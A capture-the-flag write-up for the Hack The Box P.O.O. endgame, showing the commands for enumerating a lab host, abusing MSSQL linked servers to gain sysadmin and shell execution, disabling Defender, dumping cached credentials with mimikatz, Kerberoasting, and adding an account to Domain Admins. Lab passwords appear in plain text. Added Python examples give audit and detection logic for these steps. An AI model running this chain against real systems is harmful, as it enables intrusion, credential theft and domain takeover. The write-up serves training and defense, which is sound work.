
P.O.O.

https://app.hackthebox.com/endgames/poo

Introduction

Professional Offensive Operations

By eks and mrb3n

Professional Offensive Operations is a rising name in the cyber security world.

Lately they've been working on migrating core services and components to a state-of-the-art cluster that offers cutting-edge software and hardware.

P.O.O. is designed to put your skills in enumeration, lateral movement, and privilege escalation to the test within a small Active Directory environment that is configured with the latest operating systems and technologies.

The goal is to compromise the perimeter host, escalate privileges and ultimately compromise the domain while collecting several flags along the way.

Entry Point: 10.13.38.11


Enumeration

ping -c 1 10.13.38.11 -R

NMAP Scans

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.13.38.11 -oG allPorts
nmap -p80,1433 -sCV 10.13.38.11 -oN targeted
# Nmap 7.94SVN scan initiated Fri Mar 29 18:18:25 2024 as: nmap -p80,1433 -sCV -oN targeted 10.13.38.11
Nmap scan report for 10.13.38.11
Host is up (0.26s latency).

PORT     STATE SERVICE  VERSION
80/tcp   open  http     Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
1433/tcp open  ms-sql-s Microsoft SQL Server 2017 14.00.2027.00; RTM+
|_ssl-date: 2024-03-29T22:18:45+00:00; +4s from scanner time.
| ms-sql-ntlm-info: 
|   10.13.38.11:1433: 
|     Target_Name: POO
|     NetBIOS_Domain_Name: POO
|     NetBIOS_Computer_Name: COMPATIBILITY
|     DNS_Domain_Name: intranet.poo
|     DNS_Computer_Name: COMPATIBILITY.intranet.poo
|     DNS_Tree_Name: intranet.poo
|_    Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-03-29T19:52:54
|_Not valid after:  2054-03-29T19:52:54
| ms-sql-info: 
|   10.13.38.11:1433: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM+
|       number: 14.00.2027.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: true
|_    TCP port: 1433
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 3s, deviation: 0s, median: 3s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 29 18:18:41 2024 -- 1 IP address (1 host up) scanned in 16.08 seconds

Bruteforce Directories

dirsearch -u 10.13.38.11

DS Enumeration Directory

python ds_walk.py -u http://10.13.38.11
Output of ds_walk.py
[!] .ds_store file is present on the webserver.
[+] Enumerating directories based on .ds_server file:
----------------------------
[!] http://10.13.38.11/admin
[!] http://10.13.38.11/dev
[!] http://10.13.38.11/iisstart.htm
[!] http://10.13.38.11/Images
[!] http://10.13.38.11/JS
[!] http://10.13.38.11/META-INF
[!] http://10.13.38.11/New folder
[!] http://10.13.38.11/New folder (2)
[!] http://10.13.38.11/Plugins
[!] http://10.13.38.11/Templates
[!] http://10.13.38.11/Themes
[!] http://10.13.38.11/Uploads
[!] http://10.13.38.11/web.config
[!] http://10.13.38.11/Widgets
----------------------------
[!] http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1
[!] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc
----------------------------
[!] http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/core
[!] http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db
[!] http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/include
[!] http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/src
----------------------------
[!] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/core
[!] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db
[!] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/include
[!] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/src
----------------------------
[!] http://10.13.38.11/Images/buttons
[!] http://10.13.38.11/Images/icons
[!] http://10.13.38.11/Images/iisstart.png
----------------------------
[!] http://10.13.38.11/JS/custom
----------------------------
[!] http://10.13.38.11/Themes/default
----------------------------
[!] http://10.13.38.11/Widgets/CalendarEvents
[!] http://10.13.38.11/Widgets/Framework
[!] http://10.13.38.11/Widgets/Menu
[!] http://10.13.38.11/Widgets/Notifications
----------------------------
[!] http://10.13.38.11/Widgets/Framework/Layouts
----------------------------
[!] http://10.13.38.11/Widgets/Framework/Layouts/custom
[!] http://10.13.38.11/Widgets/Framework/Layouts/default
----------------------------
[*] Finished traversing. No remaining .ds_store files present.
[*] Cleaning up .ds_store files saved to disk.

IIS Shortname Scanner

python3 iis_shortname_scanner.py http://10.13.38.11/
python3 iis_shortname_scanner.py http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db/
python3 iis_shortname_scanner.py http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/
poo_co~1.txt
_co%%%% 

Path bruteforce with WFUZZ

grep "^co" /usr/share/seclists/Discovery/Web-Content/raft-large-words-lowercase.txt > co_fuzz.txt 
wc -l co_fuzz.txt
wfuzz -c -w co_fuzz.txt -u http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db/poo_FUZZ.txt --hc 404
curl 10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db/poo_connection.txt
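To see why the short name poo_co~1.txt reported by the scanner maps to poo_connection.txt, and to audit which files in a webroot carry an 8.3 alias at all, here is an added Python example (not part of the original write-up and not code from any of the scanners it uses). It applies the documented NTFS short-name rules to a constructed list of webroot entries modelled on the ds_walk output above. Two points are this example's own assumptions rather than anything the page states: a leading-dot name such as .DS_Store is treated as having no extension (matching observed Windows behaviour for names like .gitignore), and only the "six characters + ~N" form is generated, whereas Windows switches to a hash-based alias after the fourth collision.

```python
import re
from collections import defaultdict

# Characters other than letters and digits that are legal in an 8.3 name
# (documented NTFS/FAT rule set); spaces and anything else are dropped.
SHORT_OK = set("$%'-_@~`!(){}^#&")

# Constructed sample of webroot entries, modelled on the ds_walk output above.
SAMPLE_WEBROOT = [
    "iisstart.htm", "web.config", "poo_connection.txt",
    "New folder", "New folder (2)", ".DS_Store",
    "304c0c90fbc6520610abbf378e2339d1",
]

_ALIAS = re.compile(r"^(?P<prefix>[^~.]{1,6})~\d+(?:\.(?P<ext>[^.]{1,3}))?$", re.I)


def _clean(part):
    """Uppercase and drop every character that cannot appear in an 8.3 name."""
    return "".join(c for c in part.upper() if c.isalnum() or c in SHORT_OK)


def short_names(long_names):
    """Map each name to the 8.3 alias NTFS would create, or None if the name
    already fits 8.3 and therefore gets no alias.

    Names are taken in creation order, which fixes the ~N suffix on collisions.
    Assumptions of this example: a leading-dot name is treated as having no
    extension, and only the 'six characters + ~N' form is generated.
    """
    aliases = {}
    issued = defaultdict(int)          # (6-char prefix, 3-char ext) -> aliases so far
    for name in long_names:
        base, dot, ext = name.rpartition(".")
        if not dot:
            base, ext = name, ""
        cbase, cext = _clean(base), _clean(ext)
        fits = (cbase == base.upper() and 0 < len(cbase) <= 8
                and cext == ext.upper() and len(cext) <= 3)
        if fits:
            aliases[name] = None
            continue
        if not base:                   # leading-dot name such as .DS_Store
            cbase, cext = _clean(ext), ""
        key = (cbase[:6], cext[:3])
        issued[key] += 1
        alias = f"{key[0]}~{issued[key]}"
        aliases[name] = alias + (f".{key[1]}" if key[1] else "")
    return aliases


def exposed(long_names):
    """Only the entries that an IIS tilde enumeration could observe as aliases."""
    return {n: a for n, a in short_names(long_names).items() if a}


def disclosed(alias):
    """What an alias gives away: (up to 6 leading characters, up to 3 of the extension)."""
    m = _ALIAS.match(alias)
    if not m:
        return None
    return m.group("prefix").upper(), (m.group("ext") or "").upper()


if __name__ == "__main__":
    for name, alias in short_names(SAMPLE_WEBROOT).items():
        print(f"{name!r:40} -> {alias or '(no alias)'}")
    print("poo_co~1.txt discloses", disclosed("poo_co~1.txt"))
```

On the defensive side, `fsutil 8dot3name query C:` reports whether short-name generation is enabled on a volume, and `fsutil 8dot3name strip` removes aliases that already exist (disabling generation alone leaves them in place); an IIS request-filtering rule that denies the `~` sequence in URLs blocks the enumeration at the web layer. Note that `iisstart.htm` gets no alias at all, which is why such names never show up in a tilde scan.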

MSSQL Enumeration / Linkcrawler

msfconsole
search mssql
use auxiliary/admin/mssql/mssql_enum
show options
set PASSWORD #p00Public3xt3rnalUs3r#
set USERNAME external_user
set RHOST 10.13.38.11
run
search mssql
use exploit/windows/mssql/mssql_linkcrawler
show options
set PASSWORD #p00Public3xt3rnalUs3r#
set USERNAME external_user
set RHOST 10.13.38.11

Installing usql as an MSSQL client

go install -tags most github.com/xo/usql@latest
usql 
\c mssql://external_user@10.13.38.11:1433
#p00Public3xt3rnalUs3r#

MSSQL Enumeration

SELECT name FROM sys.databases;
SELECT suser_name(); 
SELECT name,sysadmin FROM syslogins;
SELECT srvname, isremote FROM sysservers;
SELECT * FROM openquery("COMPATIBILITY\POO_CONFIG",'select current_user');
SELECT * FROM openquery("COMPATIBILITY\POO_CONFIG",'select name,sysadmin from syslogins');
SELECT * FROM openquery("COMPATIBILITY\POO_CONFIG",'select srvname,isremote from sysservers');
SELECT * FROM OPENQUERY([COMPATIBILITY\POO_CONFIG], 'EXECUTE(''SELECT * FROM OPENQUERY([COMPATIBILITY\POO_PUBLIC], ''''SELECT SUSER_NAME();'''');'')');
SELECT * FROM OPENQUERY([COMPATIBILITY\POO_CONFIG], 'SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''SERVER'');');
SELECT * FROM openquery("COMPATIBILITY\POO_CONFIG",'select * from openquery("COMPATIBILITY\POO_PUBLIC", ''select name from master.dbo.sysdatabases'')');
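The queries above uncover a link from POO_PUBLIC to POO_CONFIG and a second link from POO_CONFIG back to POO_PUBLIC under a more privileged login. The following added Python example (not part of the original write-up and not the Metasploit linkcrawler module) shows the offline audit a DBA can run on rows gathered from `sys.servers` (including `is_rpc_out_enabled`) and `sys.linked_logins`, plus the result of `IS_SRVROLEMEMBER('sysadmin')` queried through each link: it walks the link graph and reports chains that end on a sysadmin login, including the loop that returns to the starting instance. The topology follows the page; the link login names and the rpc_out values are constructed placeholders.

```python
from collections import deque

# One row per linked server: (source instance, target instance, login the link
# maps to on the target, that login is sysadmin on the target, 'rpc out' enabled).
# Topology follows the page; login names and rpc_out values are constructed.
LINKS = [
    ("COMPATIBILITY\\POO_PUBLIC", "COMPATIBILITY\\POO_CONFIG", "config_link_user", False, True),
    ("COMPATIBILITY\\POO_CONFIG", "COMPATIBILITY\\POO_PUBLIC", "public_link_user", True, True),
]


def build_graph(links):
    """Adjacency list: source -> [(target, remote login, is_sysadmin, rpc_out)]."""
    graph = {}
    for src, dst, login, is_sa, rpc_out in links:
        graph.setdefault(src, []).append((dst, login, is_sa, rpc_out))
    return graph


def privilege_paths(links, start, start_is_sysadmin=False, max_hops=4):
    """Breadth-first walk over the link graph from `start`.

    Returns every hop chain [(src, dst, remote_login), ...] whose final hop
    lands on a sysadmin login. A chain may revisit `start`: that loop is how a
    low-privileged login on one instance ends up sysadmin on the same instance.
    max_hops bounds the walk so cycles without a sysadmin hop terminate.
    """
    graph = build_graph(links)
    found = []
    queue = deque([(start, start_is_sysadmin, [])])
    while queue:
        node, is_sa, path = queue.popleft()
        if is_sa and path:
            found.append(path)
            continue
        if len(path) >= max_hops:
            continue
        for dst, login, remote_sa, _rpc in graph.get(node, []):
            queue.append((dst, remote_sa, path + [(node, dst, login)]))
    return found


def elevates_on_origin(links, start):
    """True when some chain from `start` returns to `start` as sysadmin."""
    return any(path[-1][1] == start for path in privilege_paths(links, start))


def command_execution_links(links):
    """Links where EXECUTE ... AT would run as sysadmin: sysadmin mapping plus rpc out."""
    return [(src, dst) for src, dst, _login, is_sa, rpc_out in links if is_sa and rpc_out]


if __name__ == "__main__":
    origin = "COMPATIBILITY\\POO_PUBLIC"
    for path in privilege_paths(LINKS, origin):
        print(" -> ".join(f"{dst} as {login}" for _src, dst, login in path))
    print("loop back to origin as sysadmin:", elevates_on_origin(LINKS, origin))
    print("links usable for EXECUTE AT as sysadmin:", command_execution_links(LINKS))
```

The fix on the DBA side is the mapping itself: a link that authenticates with a sysadmin login, or with a fixed login shared by every caller, hands that privilege to anyone who can reach the source instance, and `rpc out` turns the same link into a remote command channel. Mapping links to least-privileged logins (or to the caller's own identity) and leaving `rpc out` disabled unless it is needed closes both.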

Adding Username to the DB

EXECUTE('EXECUTE(''EXEC master..sp_addlogin ''''3ky'''', ''''3ky123!'''''') AT "COMPATIBILITY\POO_PUBLIC"') AT "COMPATIBILITY\POO_CONFIG";
EXECUTE('EXECUTE(''EXEC master..sp_addsrvrolemember ''''3ky'''',''''sysadmin'''''') AT "COMPATIBILITY\POO_PUBLIC"') AT "COMPATIBILITY\POO_CONFIG";

Check Username

msfconsole
search mssql
use auxiliary/admin/mssql/mssql_enum
show options
set PASSWORD 3ky123!
set USERNAME 3ky
set RHOST 10.13.38.11
run

XP_cmdshell

sqlcmd -S 10.13.38.11 -U 3ky -P 3ky123!
xp_cmdshell 'whoami';
go

Enabling external scripts

EXEC sp_configure 'external scripts enabled', 1
reconfigure
go

Using external scripts (example)

EXEC sp_execute_external_script
@language = N'Python',
@script = N'import os; os.system("whoami")'
go
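Turning on xp_cmdshell or external scripts through sp_configure, as above, writes a line to the SQL Server error log of the form `Configuration option 'external scripts enabled' changed from 0 to 1. Run the RECONFIGURE statement to install.` The following added Python example (not part of the original write-up) parses a constructed error-log excerpt in that format, flags changes that enable a command-execution option, and escalates when one session turns on more than one such option within a short window. The log lines, timestamps and spids are made up for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed error-log excerpt in the layout SQL Server uses (timestamp, spid,
# message). Timestamps, spids and the memory change are made up for this example.
SAMPLE_ERRORLOG = """\
2024-03-29 18:20:01.12 spid55      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-03-29 18:20:01.13 spid55      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-03-29 18:20:05.40 spid55      Configuration option 'external scripts enabled' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-03-29 18:21:00.00 spid62      Configuration option 'max server memory (MB)' changed from 2147483647 to 8192. Run the RECONFIGURE statement to install.
2024-03-29 18:22:00.00 spid55      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
"""

LINE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+)\s+(?P<spid>spid\d+)\s+"
    r"Configuration option '(?P<opt>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)

# Options that give a sysadmin operating-system or code execution when set to 1.
HIGH = {"xp_cmdshell", "external scripts enabled", "Ole Automation Procedures", "clr enabled"}
# Worth recording but not alarming on its own.
INFO = {"show advanced options"}


def parse_errorlog(text):
    """Turn 'Configuration option ... changed' lines into dicts; other lines are ignored."""
    events = []
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        events.append({
            "ts": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f"),
            "spid": m["spid"],
            "opt": m["opt"],
            "old": int(m["old"]),
            "new": int(m["new"]),
        })
    return events


def _enables_high(e):
    return e["opt"] in HIGH and e["old"] == 0 and e["new"] == 1


def findings(events):
    """One finding per change that enables a watched option, in log order."""
    out = []
    for e in events:
        if _enables_high(e):
            out.append({"severity": "high", "time": e["ts"], "spid": e["spid"], "option": e["opt"]})
        elif e["opt"] in INFO and e["new"] == 1:
            out.append({"severity": "info", "time": e["ts"], "spid": e["spid"], "option": e["opt"]})
    return out


def burst_sessions(events, window=timedelta(minutes=5)):
    """spids that enabled two or more HIGH options within `window` of each other."""
    by_spid = defaultdict(list)
    for e in events:
        if _enables_high(e):
            by_spid[e["spid"]].append(e["ts"])
    result = []
    for spid, times in by_spid.items():
        times.sort()
        if any(later - earlier <= window for earlier, later in zip(times, times[1:])):
            result.append(spid)
    return sorted(result)


if __name__ == "__main__":
    events = parse_errorlog(SAMPLE_ERRORLOG)
    for f in findings(events):
        print(f"{f['severity']:5} {f['time']} {f['spid']} {f['option']}")
    print("sessions enabling several execution options:", burst_sessions(events))
```

In this write-up xp_cmdshell was already usable once the 3ky login had sysadmin, so the only line a defender would see from these steps is the one for `external scripts enabled`; a SQL Server Audit or Extended Events session on `sp_configure` adds the login name that the error log lacks.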

Read web.config with type to extract the administrator credentials.

EXEC sp_execute_external_script
@language = N'Python',
@script = N'import os; os.system("type C:\\inetpub\\wwwroot\\web.config")'
go
EXEC sp_execute_external_script
@language = N'Python',
@script = N'import os; os.system("netstat -ano")'
go
echo "dead:beef::1001 compatibility.htb" | sudo tee -a /etc/hosts

Evil-WinRM

evil-winrm -i compatibility.htb -u Administrator -p "EverybodyWantsToWorkAtP.O.O."
net user administrator
Set-MpPreference -DisableRealtimeMonitoring $true

Mimikatz.exe

.\mimikatz.exe token::elevate lsadump::cache exit

Invoke-Kerberoast.ps1

sqlcmd -S 10.13.38.11 -U 3ky -P 3ky123!
xp_cmdshell 'powershell -exec bypass -c "import-module C:\temp\invoke-kerberoast.ps1; invoke-kerberoast -outputformat hashcat | fl"'
go
$krb5tgs$23$*p00_adm$intranet.poo$cyber_audit/intranet.poo...
hashcat -a0 -m 13100 hash.txt /usr/share/wordlists/seclists/Passwords/Keyboard-Combinations.txt
ZQ!5t4r

Sharphound

sqlcmd -S 10.13.38.11 -U 3ky -P 3ky123!
xp_cmdshell 'cd C:\temp && SharpHound.exe -c all'
go

PowerView.ps1

evil-winrm -i compatibility.htb -u Administrator -p "EverybodyWantsToWorkAtP.O.O." -s .
$user = 'intranet.poo\p00_adm'
$pass = ConvertTo-SecureString 'ZQ!5t4r' -AsPlainText -Force
$cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $user,$pass
Add-DomainGroupMember -Identity "Domain Admins" -Members "p00_adm" -Credential $cred


$pass = ConvertTo-SecureString 'ZQ!5t4r' -AsPlainText -Force
$cred = New-Object -TypeName System.Management.Automation.PSCredential('intranet.poo\p00_adm', $pass)
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'p00_adm' -Credential $cred
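Two of the steps above leave distinct traces on the domain controller: the Kerberoast request in the Invoke-Kerberoast section produces a 4769 service-ticket event with RC4 encryption (etype 0x17, the 23 in the `$krb5tgs$23$` hash) for a user account's SPN, and adding p00_adm to Domain Admins produces a 4728 event whose subject and member are the same account. The following added Python example (not part of the original write-up) runs both detections over constructed events in the shape a SIEM exports from the Windows Security log; every value in SAMPLE_EVENTS, including the requesting user and addresses, is made up for the example.

```python
import re

# Constructed security events. Field names follow the Windows Security log
# schema; all values are made up for this example.
SAMPLE_EVENTS = [
    {"EventID": 4769, "TimeCreated": "2024-03-29T22:30:00Z", "TargetUserName": "someuser@INTRANET.POO",
     "ServiceName": "p00_adm", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.13.38.11"},
    {"EventID": 4769, "TimeCreated": "2024-03-29T22:30:01Z", "TargetUserName": "someuser@INTRANET.POO",
     "ServiceName": "COMPATIBILITY$", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.13.38.11"},
    {"EventID": 4769, "TimeCreated": "2024-03-29T22:30:02Z", "TargetUserName": "someuser@INTRANET.POO",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.13.38.11"},
    {"EventID": 4728, "TimeCreated": "2024-03-29T22:45:00Z", "SubjectUserName": "p00_adm",
     "SubjectDomainName": "INTRANET", "TargetUserName": "Domain Admins", "TargetDomainName": "INTRANET",
     "MemberName": "CN=p00_adm,CN=Users,DC=intranet,DC=poo"},
    {"EventID": 4728, "TimeCreated": "2024-03-29T22:46:00Z", "SubjectUserName": "Administrator",
     "SubjectDomainName": "INTRANET", "TargetUserName": "Marketing", "TargetDomainName": "INTRANET",
     "MemberName": "CN=jdoe,CN=Users,DC=intranet,DC=poo"},
    {"EventID": 4756, "TimeCreated": "2024-03-29T22:47:00Z", "SubjectUserName": "Administrator",
     "SubjectDomainName": "INTRANET", "TargetUserName": "Enterprise Admins", "TargetDomainName": "INTRANET",
     "MemberName": "CN=svc_backup,CN=Users,DC=intranet,DC=poo"},
]

RC4_ETYPES = {"0x17", "0x18"}          # RC4-HMAC and RC4-HMAC-EXP
GROUP_ADD_EVENTS = {4728, 4732, 4756}  # member added to global / local / universal security group
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Schema Admins",
                     "Administrators", "Account Operators"}
_CN = re.compile(r"^CN=([^,]+)", re.I)


def cn_from_dn(dn):
    """'CN=p00_adm,CN=Users,DC=intranet,DC=poo' -> 'p00_adm'."""
    m = _CN.match(dn)
    return m.group(1) if m else dn


def rc4_tgs_requests(events):
    """4769 events requesting an RC4 service ticket for a user-account SPN.

    Computer accounts (trailing $) and krbtgt are skipped: their tickets are
    not what a Kerberoast targets and would only add noise.
    """
    hits = []
    for e in events:
        if e.get("EventID") != 4769:
            continue
        svc = e.get("ServiceName", "")
        if e.get("TicketEncryptionType", "").lower() not in RC4_ETYPES:
            continue
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        hits.append((e["TargetUserName"], svc, e.get("IpAddress", "")))
    return hits


def privileged_group_changes(events):
    """Members added to privileged groups, marking the case where an account adds itself."""
    alerts = []
    for e in events:
        if e.get("EventID") not in GROUP_ADD_EVENTS:
            continue
        group = e.get("TargetUserName", "")
        if group not in PRIVILEGED_GROUPS:
            continue
        member = cn_from_dn(e.get("MemberName", ""))
        subject = e.get("SubjectUserName", "")
        alerts.append({"time": e.get("TimeCreated"), "group": group, "member": member,
                       "by": subject, "self_add": member.lower() == subject.lower()})
    return alerts


if __name__ == "__main__":
    for who, svc, ip in rc4_tgs_requests(SAMPLE_EVENTS):
        print(f"RC4 TGS for user SPN {svc} requested by {who} from {ip}")
    for a in privileged_group_changes(SAMPLE_EVENTS):
        flag = " (self-add)" if a["self_add"] else ""
        print(f"{a['time']} {a['by']} added {a['member']} to {a['group']}{flag}")
```

The RC4 check works because a service account whose password was set while RC4 was allowed, or whose msDS-SupportedEncryptionTypes still permits it, receives RC4 tickets on request; moving such accounts to AES-only and to long, random passwords (or to group managed service accounts) removes the weak hash that hashcat cracked above. The group check needs the "Audit Security Group Management" subcategory enabled on domain controllers so that 4728, 4732 and 4756 are written at all.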
